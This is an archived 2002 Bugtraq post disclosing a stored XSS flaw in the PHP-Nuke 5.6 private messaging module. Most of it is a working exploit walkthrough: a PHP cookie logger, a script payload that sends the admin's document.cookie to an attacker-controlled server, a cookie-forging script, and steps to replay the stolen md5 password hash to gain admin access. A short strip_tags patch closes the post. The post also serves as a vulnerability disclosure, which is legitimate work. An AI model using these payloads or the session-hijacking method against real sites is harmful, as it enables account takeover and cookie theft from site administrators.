linux, säkerhet

73327 2002-08-15  20:56  /113 rader/ <-delusion-> <delusi0n@bellsouth.net>
Importerad: 2002-08-15  20:56  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: webappsec@secuirtyfocus.com
Mottagare: Bugtraq (import) <1109>
Ärende: PHP-Nuke v5.6 - Users can compromise admin accts.
------------------------------------------------------------
 Tested on PHP-Nuke v5.6 with Mozilla on Linux
(should work on past versions and on most browsers)

 Impact:
 ---------------------------------------------
 Allows any user to get admin access to a PHP-Nuke site.

Summary:
----------------------------------------------
Due to a XSS flaw in PHPNuke's Private Messaging module, users can send
messages
with html code that will be executed without any filtering. In old PHPNuke
versions
XSS allowed theft of cookies which stored passwords in base64
encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before it
encodes it
into base64 and puts it into a cookie. This made stolen cookies useless if
the attacker just
tried decoding the base64 encrypted pass, because he just got the MD5
encrypted pass.

Since PHP Nuke encrypts passes in md5 and then matches the encrypted
pass with the encrypted one in the database, i was able to use the
md5 encrypted pass i got from the stolen cookie to authenticate
myself.

PHPNuke sets cookies by base64 encoding a string that looks like this:

username:md5_encrypted_pass:lang

Since i can get the md5_encrypted pass all i have to do is launch a
script that base64 encodes a string like the one above, and sets it
as a cookie on my box.

Exploit:
-------------------------------------------------
For this exploit to work, you must create the following files in your web
server's directory.

cookie.php containing this:
<?
$fp = fopen("cookie.txt","a");
fputs($fp, $cookie);
fclose($fp);
print "Message Not Found!"; /* this is so the admin doesnt get scared. and
thinks its some bug. */
?>

test.php containing:
<?
$admin = base64_encode("decoded_string") ;
setcookie("admin","$admin",time()+2592000);
?>
You will find out what to replace decoded_string with..

1. Send an appealing private message to admin containing
<script>document.location.replace('http://yourserver/cookie.php?cookie='+doc
ument.cookie);</script>

2. Wait awhile until the admin checks the message then check
cookie.txt on yer server.

3. From cookie.txt.. copy the encrypted text after admin= and before
the ;

4. go to http://www.isecurelabs.com/base64.php paste the copied text,
click decode it should give u a string like this:
username:md5_encrypted_passwd:language (language may be blank).

5. paste the decoded string into test.php like so.
<?
$admin = base64_encode("paste decoded string here");
setcookie("admin","$admin",time()+2592000);
?>

6. Login as any user on the site

7. send private message to self containing:
<iframe src="http://yerserver/test.php"></iframe>
Open the message and a cookie will now be set on yer box, but it will be
configured with your server's URL.
So all u gotta do is replace yer url wit the nuked site.

8. for mozilla edit cookies.txt in yer
~/.mozilla/someprofile/something/ directory replace the url of yer
server to the nuked site, for other browsers just find the Cookie
from your server and edit it so instead of showng your url it shows
the url of the nuked site.

9. restart yer browser (close and open up again). go back into the
nuked site and you are now admin. :D

Temp Solution:
-------------------------------------------------
Edit reply.php in /modules/Private_Messages/ and make $message be stripped
of html tags.

Go to line 75 in reply.php and add this line:

$message = strip_tags($message, '<br><b><u><i>');

That will remove any html tags that arent <br><b><u> or <i>. So it
will prevent the XSS.
-------------------------------------------------
NOTE: I wasnt able to contact the php nuke person, i couldnt find an email
on their site, and when i signed up for membership i never got the password,
so if u can, let them know asap so they can fix this.

Another Vulnerability Brought to you  by,
delusion
http://digital-delusions.dyn.ee
(73327) /<-delusion-> <delusi0n@bellsouth.net>/(Ombruten)